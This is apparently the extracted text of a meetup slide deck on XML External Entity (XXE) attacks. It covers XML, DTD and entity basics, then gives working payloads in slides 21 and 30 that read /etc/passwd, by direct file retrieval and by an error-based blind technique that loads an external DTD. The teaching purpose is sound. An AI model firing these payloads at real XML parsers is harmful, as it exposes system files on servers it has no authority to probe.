This document discusses XML External Entity (XXE) attacks. It begins with an overview of XXE attacks and their ranking in the OWASP Top 10 list. It then provides background on XML, explaining what it is, how it is structured, and how to define DTDs. The document demonstrates different types of XXE attacks like retrieving files, performing server-side request forgery, and exfiltrating data blindly. It also covers mitigations like disabling external entities.
3. # Description:
An XML External Entity attack is a type of attack against an
application that parses XML input. This attack occurs when XML input
containing a reference to an external entity is processed by a weakly
configured XML parser.
Ranked on 4th of OWASP Top 10 (2017).
- OWASP
5. # What is XML?
XML stands for eXtensible Markup Language. It is a text-based
markup language.
XML was released in late 90’s. it was created to provide an easy to
use and store self describing data.
XML is designed to carry data, not to display data.
XML tags are not predefined. You must define your own tags.
XML is platform independent and language independent.
6. # XML Example:
<?xml version = "1.0"?>
<NullMeet>
<Speaker>
<FirstName>Ankit</FirstName>
<LastName>Patel</LastName>
<ContactNo>1234567890</ContactNo>
<Email>ankitpatel@null_mumbai.com</Email>
<City>Mumbai</City>
</Speaker>
</NullMeet>
7.
8. # XML Attributes vs Elements
XML using attributes:
<person gender=“male">
<firstname>Ankit</firstname>
<lastname>Patel</lastname>
</person>
XML using elements:
<person>
<gender>male</gender>
<firstname>Ankit</firstname>
<lastname>Patel</lastname>
</person>
9. # XML DTD
Document Type Declaration, commonly known as DTD.
A DTD defines the structure and the legal elements and attributes of
an XML document.
Why use DTD?
An application can use a DTD to verify that XML is valid.
10. # Types of DTD
There are two types of DTD :-
Internal DTD
External DTD
Internal DTD
If the DTD is declared inside the XML file, it must be wrapped inside
the <!DOCTYPE> definition.
External DTD
If the DTD is declared in an external file, the <!DOCTYPE> definition
must contain a reference to the DTD file.
12. # Internal DTD
!DOCTYPE NullMeet defines that the root element of this document
is NullMeet.
!ELEMENT NullMeet defines that the NullMeet element must
contain four elements: “FirstName, LastName, ContactNo, Email,
City“.
!ELEMENT “FirstName, LastName, ContactNo, Email, City” defines
the to element to be of type "#PCDATA“.
13. # External DTD
If the DTD is declared in an external file, the <!DOCTYPE> definition
must contain a reference to the DTD file.
External dtd file :-
15. # XML DTD entities
Entities are used to define shortcuts to special characters.
Entities can be declared internal or external.
Internal Entity
An internal entity is one that is defined locally within a DTD.
Declaring the internal entity
Entities must be declared before they can be used.
All entities are declared with the "ENTITY" declaration.
16. # XML DTD built-in entities
All XML parsers must support built-in entities.
There are five built-in entities that play their role in well-formed
XML, they are: -
ampersand: &
Single quote: '
Greater than: >
Less than: <
Double quote: "
17. # XML DTD entities
Internal entity example :-
I. Syntax
<!ENTITY entity-name "entity-value">
II. Internal DTD Example
<!DOCTYPE Nullmum [
<!ENTITY writer "Ankit">
]>
The XML file :-
<Nullmum>&writer;<Nullmum>
18. # XML DTD entities
External entity
External entities, like internal entities, have names and are referenced in the
same manner, although they are declared differently.
External entity example :-
I. Syntax
<!ENTITY entity-name SYSTEM "URI/URL">
// SYSTEM keyword and must specify a URL ( Protocols like http, ftp, file, etc
are allowed).
II. External DTD Example
The XML file :-
<!ENTITY writer SYSTEM "https://www.w3schools.com/external.dtd">
<author>&writer;</author>
20. # Types of XXE attacks
There are various types of XXE attacks:
Exploiting XXE to retrieve files, where an external entity is defined
containing the contents of a file, returned in the application's
response.
Exploiting XXE to perform SSRF attacks, where an external entity is
defined based on a URL to a back-end system.
Exploiting blind XXE exfiltrate data out-of-band, where sensitive data
is transmitted from the application server to a system that the
attacker controls.
Exploiting blind XXE to retrieve data via error messages, where the
attacker can trigger a parsing error message containing sensitive data.
21. Exploiting XXE to retrieve files
Payload used:-
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
XML file :-
<productId>&xxe;</productId>
25. # Parameter Entities
Parameter entities accomplish the same task as the other entities do.
Parameter entities are used exclusively within DTDs.
Using parameter entities you can include element and attribute list
declarations as groups and refer to them easily as single entities.
You can even include an entire DTD in a parameter entity.
Example :-
<!ENTITY % myParameterEntity “Element" >
26. # Parameter Entities
Example :-
<!ENTITY % customer "name, street, city, state, zipcode">
Later in the DTD, you can reference this parameter entity as follows :-
<!ELEMENT invoice (%customer;, item, price, date)>
When this DTD is processed, it is as if you had specified the following :-
<!ELEMENT invoice (name, street, city, state, zipcode, item, price, date)>
30. Exploiting blind XXE to retrieve data via error
messages
Payloads used :-
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
XML file:-
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>